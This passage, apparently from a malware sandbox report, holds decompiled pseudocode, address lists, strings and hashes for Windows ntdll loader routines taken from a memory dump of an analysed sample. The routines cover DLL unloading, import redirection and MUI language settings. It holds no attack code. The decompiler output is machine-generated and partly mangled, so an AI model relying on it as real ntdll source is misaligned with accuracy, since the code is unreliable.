								if(_v12 != 0) {
									E328B9723(_t86, 0);
								}
								_t50 = E328A3BC0( *0x32985d74, 0, _t104);
								continue;
							}
							_t112 = _t60;
							do {
								_t70 =  *_t112;
								_t93 = _t112;
								_t112 = _t70;
								__eflags = _t70 - _t100;
							} while (_t70 != _t100);
							_t110 = _v8;
							goto L27;
						}
					}
					_t105 =  *_t110;
					 *(_t110 + 0x20) = 0xfffffffe;
					if(_t105 == _t110) {
						L8:
						return _t50;
					} else {
						goto L5;
					}
					do {
						L5:
						_t85 =  *_t105;
						_t107 = _t105 + 0xffffffac;
						 *(_t107 + 0x34) =  *(_t107 + 0x34) | 0x00000002;
						E328B9938(L328A2330(_t50, 0x32986668), _t107);
						if(( *(_t107 + 0x34) & 0x00000080) != 0) {
							_t28 = _t107 + 0x74; // -56
							L328B9B40(_t85, _t107, _t110, 0x329867ac);
							_t29 = _t107 + 0x68; // -68
							L328B9B40(_t85, _t107, _t110, 0x329867a4);
							 *(_t107 + 0x20) =  *(_t107 + 0x20) & 0x00000000;
						}
						E328A24D0(0x32986668);
						if( *0x32985d70 != 0) {
							E328C680F(_t107);
						}
						_t50 = E328AD3E1(_t85, _t107, _t110);
						_t105 = _t85;
					} while (_t85 != _t110);
					goto L8;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 7) {
					goto L10;
				}
				if( *((intOrPtr*)(__ecx + 0x20)) == 9) {
					goto L9;
				}
				goto L3;
			}

0x328b9723
0x328b972b
0x328b9736
0x328b9738
0x328b973c
0x328b973e
0x328b9742
0x328b9747
0x328b97bc
0x328b97bc
0x328b97bc
0x328b97bc
0x328b97c0
0x328b97c5
0x328b97c5
0x328b97cb
0x328b9900
0x328b9908
0x328b9911
0x328b9913
0x328b9914
0x328b9916
0x328b9918
0x328b9918
0x328b97d6
0x328b97db
0x328b97dd
0x328b97dd
0x328b97e1
0x328b97e3
0x00000000
0x00000000
0x328b97e5
0x328b97e5
0x328b97e8
0x328b97ec
0x328b97ee
0x328b97f1
0x328b97f4
0x328b97f9
0x328b97fb
0x328b9922
0x328b9928
0x328b9928
0x328b9803
0x328b9805
0x328b980a
0x328b980e
0x328b9815
0x328fdade
0x328fdae0
0x328fdae0
0x328b9815
0x328b981b
0x328b9822
0x328fdaea
0x328fdb04
0x328fdb09
0x328fdb09
0x328b9828
0x328b982a
0x328b982d
0x328b9836
0x328b9836
0x328b983a
0x328b983f
0x328b9755
0x328b9755
0x328b9755
0x328b975a
0x00000000
0x00000000
0x328b986e
0x328b9870
0x328b9872
0x328b992f
0x328b9931
0x328b9878
0x328b9878
0x328b9878
0x328b9878
0x328b9878
0x328b987c
0x328b987e
0x00000000
0x328b9884
0x328b9889
0x328b988e
0x328b9891
0x328b9894
0x328b9897
0x328b9899
0x328b989d
0x328b989f
0x328b98b1
0x328b98b3
0x328b98b5
0x328b98b8
0x328b98c0
0x328b98c2
0x328b98c2
0x328b98c4
0x328b98c4
0x328b98cd
0x328b98d0
0x328b98da
0x328b98df
0x328b98e4
0x328b98e8
0x328b98e8
0x328b98f6
0x00000000
0x328b98f6
0x328b98a1
0x328b98a3
0x328b98a3
0x328b98a5
0x328b98a7
0x328b98a9
0x328b98a9
0x328b98ad
0x00000000
0x328b98ad
0x328b987e
0x328b9760
0x328b9762
0x328b976b
0x328b97b5
0x328b97bb
0x00000000
0x00000000
0x00000000
0x328b976d
0x328b976d
0x328b976d
0x328b976f
0x328b9777
0x328b9782
0x328b978b
0x328b9849
0x328b9852
0x328b9857
0x328b9860
0x328b9865
0x328b9865
0x328b9796
0x328b97a2
0x328fdb13
0x328fdb13
0x328b97aa
0x328b97af
0x328b97b1
0x00000000
0x328b976d
0x328b974d
0x00000000
0x00000000
0x328b9753
0x00000000
0x00000000
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 328B9922

Strings

LdrpUnloadNode, xrefs: 328FDAF5
minkernel\ntdll\ldrsnap.c, xrefs: 328FDAFF
Unmapping DLL "%wZ", xrefs: 328FDAEE

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
API String ID: 3446177414-2283098728
Opcode ID: a7a4c98df8ecd85f9969343044cdfc5b98538b76626643b9c87c27161a686ea0
Instruction ID: c6b56e8bf3eaf221a83babdb8f3174c01fe44cff22cd62828265506bea4bbf07
Opcode Fuzzy Hash: a7a4c98df8ecd85f9969343044cdfc5b98538b76626643b9c87c27161a686ea0
Instruction Fuzzy Hash: 1E51047C2047059FEB14DF38C880B2977D1BF88314F080A6CE9699B791EB709846CF81

Uniqueness

Uniqueness Score: -1.00%

Function 328CC640 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 141
timeCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E328CC640(void* __ebx, signed int __ecx, void* __edx, void* __edi) {
				signed int _v20;
				signed int _v36;
				char _v544;
				char _v552;
				char _v556;
				char* _v560;
				short _v562;
				signed int _v564;
				short _v570;
				char _v572;
				signed int _v580;
				char _v588;
				signed int _v604;
				signed short _v608;
				void* __esi;
				void* __ebp;
				void* _t25;
				signed int* _t27;
				signed int _t39;
				signed int _t42;
				signed int _t54;
				signed char _t56;
				signed int* _t58;
				intOrPtr* _t65;
				signed int _t67;
				void* _t70;
				signed int _t72;
				signed int _t75;
				void* _t77;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;

				_t70 = __edx;
				_push(__ebx);
				_push(__edi);
				_t72 = __ecx;
				_t25 = E328B0130();
				if(_t25 != 0) {
					L328A2330(_t25, 0x32985b5c);
					_t27 =  *0x32989224; // 0x0
					_t75 =  *_t27;
					__eflags = _t72;
					if(_t72 != 0) {
						__eflags = _t75;
						if(_t75 == 0) {
							goto L13;
						} else {
							_t80 = _t75 - 1;
							goto L7;
						}
					} else {
						__eflags = _t75;
						if(_t75 == 0) {
							E32889050( *0x3298921c, _t75);
						}
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							L13:
							E328A24D0(0x32985b5c);
							_t65 = 0xe;
							asm("int 0x29");
							_t87 = (_t85 & 0xfffffff8) - 0x224;
							_v20 =  *0x3298b370 ^ _t87;
							_t76 = _t65;
							 *0x329891e0( &_v544, "true", _t75, _t82);
							_t67 =  *_t65() + _t33;
							__eflags = _t67;
							if(_t67 != 0) {
								__eflags =  *0x3298660c;
								_v560 =  &_v552;
								_v564 = _t67;
								_v562 = 0x208;
								if(__eflags == 0) {
									L25:
									_push( &_v556);
									_push( &_v564);
									E3291CB20(0x32985b5c, _t72, _t76, __eflags);
									goto L15;
								} else {
									_t76 = ( *0x32986608 & 0x0000ffff) + 2 + _t67;
									_t42 = L328A5D90(_t67,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t76);
									_v580 = _t42;
									__eflags = _t42;
									if(_t42 != 0) {
										__eflags = 0;
										_v570 = _t76;
										_v572 = 0;
										E328B10D0(_t67,  &_v572, 0x32986608);
										E328B10D0(_t67,  &_v580,  &_v572);
										E3289FE40(_t67,  &_v588, ";");
										E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *0x3298660c);
										 *0x32986608 = _v608;
										_t54 = _v604;
										 *0x3298660c = _t54;
										 *0x32986604 = _t54;
										E3291D4A0(_t67, __eflags);
										goto L25;
									} else {
										_t56 =  *0x329837c0; // 0x0
										__eflags = _t56 & 0x00000003;
										if((_t56 & 0x00000003) != 0) {
											_push("Failed to reallocate the system dirs string !\n");
											_push(0);
											_push("LdrpInitializePerUserWindowsDirectory");
											_push(0xcf4);
											_push("minkernel\\ntdll\\ldrinit.c");
											E3290E692();
											_t56 =  *0x329837c0; // 0x0
											_t87 = _t87 + 0x14;
										}
										__eflags = _t56 & 0x00000010;
										if((_t56 & 0x00000010) != 0) {
											asm("int3");
										}
										_t39 = 0xc0000017;
									}
								}
							} else {
								L15:
								_t39 = 0;
								__eflags = 0;
							}
							_pop(_t77);
							__eflags = _v36 ^ _t87;
							return E328D4B50(_t39, 0x32985b5c, _v36 ^ _t87, _t70, _t72, _t77);
						} else {
							_t80 = _t75 + 1;
							__eflags = _t80;
							L7:
							_t58 =  *0x32989224; // 0x0
							 *_t58 = _t80;
							__eflags = _t72;
							if(_t72 != 0) {
								__eflags = _t80;
								if(_t80 == 0) {
									E32889050( *0x3298921c, 1);
								}
							}
							_t25 = E328A24D0(0x32985b5c);
							goto L1;
						}
					}
				} else {
					L1:
					return _t25;
				}
			}

0x328cc640
0x328cc642
0x328cc644
0x328cc645
0x328cc647
0x328cc64e
0x328cc65a
0x328cc65f
0x328cc664
0x328cc666
0x328cc668
0x328cc6a4
0x328cc6a6
0x00000000
0x328cc6a8
0x328cc6a8
0x00000000
0x328cc6a8
0x328cc66a
0x328cc66a
0x328cc66c
0x328cc675
0x328cc675
0x328cc67a
0x328cc67d
0x328cc6ab
0x328cc6ac
0x328cc6b3
0x328cc6b4
0x328cc6be
0x328cc6cb
0x328cc6dc
0x328cc6df
0x328cc6e9
0x328cc6e9
0x328cc6eb
0x32908090
0x3290809b
0x329080a4
0x329080a9
0x329080ae
0x3290817f
0x32908183
0x32908188
0x32908189
0x00000000
0x329080b4
0x329080c4
0x329080cc
0x329080d1
0x329080d5
0x329080d7
0x32908114
0x32908116
0x3290811b
0x3290812a
0x32908139
0x32908148
0x3290815e
0x32908167
0x3290816c
0x32908170
0x32908175
0x3290817a
0x00000000
0x329080d9
0x329080d9
0x329080de
0x329080e0
0x329080e2
0x329080e7
0x329080e9
0x329080ee
0x329080f3
0x329080f8
0x329080fd
0x32908102
0x32908102
0x32908105
0x32908107
0x32908109
0x32908109
0x3290810a
0x3290810a
0x329080d7
0x328cc6f1
0x328cc6f1
0x328cc6f1
0x328cc6f1
0x328cc6f1
0x328cc6fa
0x328cc6fb
0x328cc705
0x328cc67f
0x328cc67f
0x328cc67f
0x328cc680
0x328cc680
0x328cc685
0x328cc687
0x328cc689
0x328cc68b
0x328cc68d
0x328cc697
0x328cc697
0x328cc68d
0x328cc69d
0x00000000
0x328cc69d
0x328cc67d
0x328cc650
0x328cc650
0x328cc653
0x328cc653

APIs

RtlDebugPrintTimes.NTDLL ref: 328CC6DF

Strings

LdrpInitializePerUserWindowsDirectory, xrefs: 329080E9
Failed to reallocate the system dirs string !, xrefs: 329080E2
minkernel\ntdll\ldrinit.c, xrefs: 329080F3

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 3446177414-1783798831
Opcode ID: 13b4eecea9e0d0c6b3cc811c7fc4e4b3f1ca6c4e9a5c761fb2482422df210470
Instruction ID: 42fbe95b1a55be95c450fca8a8929bfa8d3b0d5fa4c22180d2a935ea47b6f859
Opcode Fuzzy Hash: 13b4eecea9e0d0c6b3cc811c7fc4e4b3f1ca6c4e9a5c761fb2482422df210470
Instruction Fuzzy Hash: 814126B9549314ABE710EB68DD40F5BB7E8EF44B50F04492EF858E7251EB70D842CB92

Uniqueness

Uniqueness Score: -1.00%

Function 329143D5 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121
timeCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E329143D5(intOrPtr __ecx, void* __edx, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __esi;
				signed char _t37;
				signed int _t41;
				intOrPtr _t44;
				signed int _t49;
				signed int _t50;
				signed int _t51;
				signed int _t52;
				void* _t54;
				signed int _t59;
				signed int _t60;
				signed int _t64;
				signed int _t66;
				intOrPtr _t68;
				signed int _t69;
				intOrPtr _t70;

				_t68 = _a4;
				_t54 = __edx;
				_v28 = __ecx;
				_v24 = E32914B46(_t68);
				_v12 =  *((intOrPtr*)(_t54 + 0x2c));
				_v8 =  *((intOrPtr*)(_t54 + 0x30));
				_v20 =  *((intOrPtr*)(_t54 + 0x90));
				_t37 =  *0x32986714; // 0x0
				_v16 = _t68;
				_t69 =  *0x32986710; // 0x0
				if((_t37 & 0x00000001) != 0) {
					if(_t69 == 0) {
						_t69 = 0;
						__eflags = 0;
					} else {
						_t69 = _t69 ^ 0x32986710;
					}
				}
				_t64 = _t37 & 1;
				while(_t69 != 0) {
					__eflags = E32914528(_t54, _t69,  &_v24, _t69);
					if(__eflags >= 0) {
						if(__eflags <= 0) {
							L25:
							while(_t69 != 0) {
								_t41 = E32914528(_t54, _t69,  &_v24, _t69);
								__eflags = _t41;
								if(_t41 != 0) {
									break;
								}
								_t66 =  *0x32985ca0; // 0x0
								__eflags = _t66;
								if(_t66 == 0) {
									L28:
									__eflags =  *0x329837c0 & 0x00000005;
									_t70 =  *((intOrPtr*)(_t69 + 0x20));
									if(( *0x329837c0 & 0x00000005) != 0) {
										_t44 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
										_push( *((intOrPtr*)(_t44 + 0x2a8)));
										_push( *((intOrPtr*)(_t44 + 0x2a4)));
										_push(_a4);
										_push( *((intOrPtr*)(_t54 + 0x30)));
										_push( *((intOrPtr*)(_t54 + 0x2c)));
										_push( *((intOrPtr*)(_v28 + 0x30)));
										E3290E692("minkernel\\ntdll\\ldrredirect.c", 0x12b, "LdrpCheckRedirection", 2, "Import Redirection: %wZ %wZ!%s redirected to %wZ\n",  *((intOrPtr*)(_v28 + 0x2c)));
									}
									L27:
									return _t70;
								}
								 *0x329891e0( *((intOrPtr*)(_v28 + 0x28)),  *((intOrPtr*)(_t69 + 0x24)));
								_t49 =  *_t66();
								__eflags = _t49;
								if(_t49 != 0) {
									goto L28;
								}
								_t50 =  *(_t69 + 4);
								_t59 = _t69;
								__eflags = _t50;
								if(_t50 == 0) {
									while(1) {
										_t69 =  *(_t69 + 8) & 0xfffffffc;
										__eflags = _t69;
										if(_t69 == 0) {
											goto L25;
										}
										__eflags =  *_t69 - _t59;
										if( *_t69 == _t59) {
											goto L25;
										}
										_t59 = _t69;
									}
									continue;
								}
								_t69 = _t50;
								_t60 =  *_t69;
								__eflags = _t60;
								if(_t60 == 0) {
									continue;
								} else {
									goto L20;
								}
								do {
									L20:
									_t51 =  *_t60;
									_t69 = _t60;
									_t60 = _t51;
									__eflags = _t51;
								} while (_t51 != 0);
							}
							_t70 = 0xffbadd11;
							goto L27;
						}
						_t52 =  *(_t69 + 4);
						L9:
						__eflags = _t64;
						if(_t64 == 0) {
							L12:
							_t69 = _t52;
							continue;
						}
						__eflags = _t52;
						if(_t52 == 0) {
							goto L12;
						}
						_t69 = _t69 ^ _t52;
						continue;
					}
					_t52 =  *_t69;
					goto L9;
				}
				goto L25;
			}

0x329143e2
0x329143e5
0x329143e7
0x329143f3
0x329143fa
0x32914401
0x3291440b
0x3291440f
0x32914414
0x32914418
0x32914420
0x32914424
0x3291442e
0x3291442e
0x32914426
0x32914426
0x32914426
0x32914424
0x32914433
0x3291445e
0x32914443
0x32914445
0x3291444b
0x00000000
0x329144c0
0x3291446a
0x3291446f
0x32914471
0x00000000
0x00000000
0x32914473
0x32914479
0x3291447b
0x329144d4
0x329144d4
0x329144db
0x329144de
0x329144e6
0x329144e9
0x329144ef
0x329144f9
0x329144fc
0x329144ff
0x32914502
0x3291451e
0x32914523
0x329144c9
0x329144d1
0x329144d1
0x32914489
0x3291448f
0x32914491
0x32914493
0x00000000
0x00000000
0x32914495
0x32914498
0x3291449a
0x3291449c
0x329144b8
0x329144bb
0x329144bb
0x329144be
0x00000000
0x00000000
0x329144b2
0x329144b4
0x00000000
0x00000000
0x329144b6
0x329144b6
0x00000000
0x329144b8
0x3291449e
0x329144a0
0x329144a2
0x329144a4
0x00000000
0x00000000
0x00000000
0x00000000
0x329144a6
0x329144a6
0x329144a6
0x329144a8
0x329144aa
0x329144ac
0x329144ac
0x329144b0
0x329144c4
0x00000000
0x329144c4
0x3291444d
0x32914450
0x32914450
0x32914452
0x3291445c
0x3291445c
0x00000000
0x3291445c
0x32914454
0x32914456
0x00000000
0x00000000
0x32914458
0x00000000
0x32914458
0x32914447
0x00000000
0x32914447
0x00000000

APIs

RtlDebugPrintTimes.NTDLL ref: 32914489

Strings

LdrpCheckRedirection, xrefs: 3291450F
minkernel\ntdll\ldrredirect.c, xrefs: 32914519
Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 32914508

Memory Dump Source

Source File: 00000003.00000002.1092236541.0000000032860000.00000040.00001000.00020000.00000000.sdmp, Offset: 32860000, based on PE: true

Associated: 00000003.00000002.1092236541.0000000032989000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1092236541.000000003298D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32860000_wLlREXsA9M.jbxd

Similarity

API ID: DebugPrintTimes
String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
API String ID: 3446177414-3154609507
Opcode ID: 54c4820dc42c2868e90080b28e7f473e5d38193bc1f7044cd1003cacd5d92f81
Instruction ID: 03421047d1688f26b786b8ac6dd1d165bb3b5ec62e9d1a87f8ad0f854c81c5f1
Opcode Fuzzy Hash: 54c4820dc42c2868e90080b28e7f473e5d38193bc1f7044cd1003cacd5d92f81
Instruction Fuzzy Hash: 1141C376605719DFEB11CF5AC841A1677E8AF4C754F051669EC5C9B391DB30F800CB91

Uniqueness

Uniqueness Score: -1.00%

Function 328B510F Relevance: 6.7, Strings: 5, Instructions: 434
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E328B510F(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E328B8BD1(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E328B8BD1(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E328B8BD1(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E328B8BD1(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E328B8BD1(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t71 = _v12 + 4; // 0x6
						_t255 = _t71;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L328A5D90(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E328D88C0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E328DA8B0(_t276, ";");
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E328D5050(0,  &_v68, _t170);
									if(E328B56E0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E328D5050(_t257,  &_v68, _t243);
								if(E328B56E0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E328DA8B0(_t278, ";");
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t48 = _v12 + 4; // 0x6
					_t260 = _t48;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L328A5D90(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E328D88C0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E328DA8B0(_v16, ";");
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E328D5050(_t262,  &_v68, _t244);
								if(E328B56E0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E328DA8B0(_t282, ";");
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E328D5050(_t262,  &_v68, _t201);
							if(E328B56E0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t26 = _v12 + 4; // 0x6
				_t264 = _t26;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L328A5D90(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), "true", _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E328D88C0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E328DA8B0(_t280, ";");
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E328D5050(_t267,  &_v68, _t245);
							if(E328B56E0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E328DA8B0(_t284, ";");
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
					_t280 = 0;
					if( *_v48 != 0) {
						E328D5050(_t267,  &_v68, _t224);
						if(E328B56E0( &_v68,  &_v24) != 0) {
							_t275 = _t275 + 1;
						}
					}
					if(_t275 == 0) {
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
						_v40 = _t280;
						_v20 = _t280;
					}
					_t225 = _v8;
					if(_v8 != 0) {
						E328A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x328b5117
0x328b511d
0x328b511f
0x328b5121
0x328b5124
0x328b5127
0x328b512a
0x328b512d
0x328b5130
0x328b5133
0x328b5136
0x328b513a
0x328b513c
0x328b5141
0x328fb9ab
0x328fb9b0
0x328b5460
0x328b5463
0x328b5469
0x328b546f
0x328b5475
0x328b547b
0x328b5481
0x328b5484
0x328b548a
0x328b5491
0x328b5496
0x328b5496
0x328b515e
0x328fb9b7
0x328fb9c1
0x328fb9d0
0x328fb9d0
0x328fb9d5
0x328fb9d5
0x328b517b
0x328b518a
0x328b5190
0x328b5195
0x328b5195
0x328b51af
0x328b526f
0x328b5286
0x328b5348
0x328b535f
0x328b5446
0x328b5446
0x328b5449
0x328b5449
0x328b544b
0x328b544f
0x328fbae9
0x328fbae9
0x328b5455
0x328b545a
0x328fbaf5
0x328fbb08
0x328fbb0f
0x328fbb11
0x328fbb14
0x328fbb14
0x328fbaf5
0x00000000
0x328b545a
0x328b5368
0x328b5368
0x328b536b
0x328b5370
0x328fbaa5
0x328fbaa7
0x328b5376
0x328b5387
0x328b5389
0x328b538c
0x328b538c
0x328b5391
0x328fbaaf
0x328fbab2
0x00000000
0x328b5397
0x328b539c
0x328b53a4
0x328b53b2
0x328b53b5
0x328b53b8
0x328b53fc
0x328b53fc
0x328b5404
0x328b540b
0x328b541f
0x328b5421
0x328b5421
0x328b541f
0x328b5424
0x328fbabf
0x328fbacc
0x328fbad1
0x328fbad4
0x328b542a
0x328b542a
0x328b542a
0x328b542c
0x328b5431
0x328b543e
0x328b543e
0x328b5443
0x00000000
0x328b5443
0x328b53ba
0x328b53bd
0x328b53bf
0x328b53c2
0x328b53ca
0x328b53de
0x328b53e0
0x328b53e0
0x328b53e7
0x328b53ee
0x328b53f1
0x328b53f2
0x328b53f6
0x328b53f9
0x00000000
0x328b53f9
0x328b5391
0x328b528f
0x328b528f
0x328b5292
0x328b5297
0x328fba41
0x328fba43
0x328b529d
0x328b52ae
0x328b52b0
0x328b52b3
0x328b52b3
0x328b52b8
0x328fba4b
0x328fba4e
0x00000000
0x328b52be
0x328b52c3
0x328b52c8
0x328b52cb
0x328b52ce
0x328b52dd
0x328b52e0
0x328b52e3
0x328fba58
0x328fba5b
0x328fba5d
0x328fba60
0x328fba68
0x328fba7c
0x328fba7e
0x328fba7e
0x328fba85
0x328fba8c
0x328fba8f
0x328fba90
0x328fba94
0x328fba97
0x328fba97
0x328b52e9
0x328b52ec
0x328b52f1
0x328b52f8
0x328b530c
0x328fba9f
0x328fba9f
0x328b530c
0x328b5314
0x328b5323
0x328b5328
0x328b532b
0x328b532b
0x328b532e
0x328b5333
0x328b5340
0x328b5340
0x328b5345
0x00000000
0x328b5345
0x328b52b8
0x328b51b8
0x328b51b8
0x328b51bb
0x328b51c0
0x328fb9dd
0x328b51c6
0x328b51d2
0x328b51d7
0x328b51d9
0x328b51dc
0x328b51dc
0x328b51e1
0x328fb9e5
0x328fb9e7
0x328fb9ec
0x00000000
0x328b51e7
0x328b51ec
0x328b51f1
0x328b51f4
0x328b5204
0x328b5207
0x328b520a
0x328fb9f4
0x328fb9f7
0x328fb9f9
0x328fb9fc
0x328fba04
0x328fba18
0x328fba1a
0x328fba1a
0x328fba21
0x328fba28
0x328fba2b
0x328fba2c
0x328fba30
0x328fba33
0x328fba33
0x328b5210
0x328b5213
0x328b5218
0x328b521f
0x328b5233
0x328fba3b
0x328fba3b
0x328b5233
0x328b523b
0x328b524a
0x328b524f
0x328b5252
0x328b5252
0x328b5255
0x328b525a
0x328b5267
0x328b5267
0x328b526c
0x00000000
0x328b526c

Strings

Kernel-MUI-Language-SKU, xrefs: 328B534B
Kernel-MUI-Language-Allowed, xrefs: 328B519B
Kernel-MUI-Language-Disallowed, xrefs: 328B5272
Kernel-MUI-Number-Allowed, xrefs: 328B5167
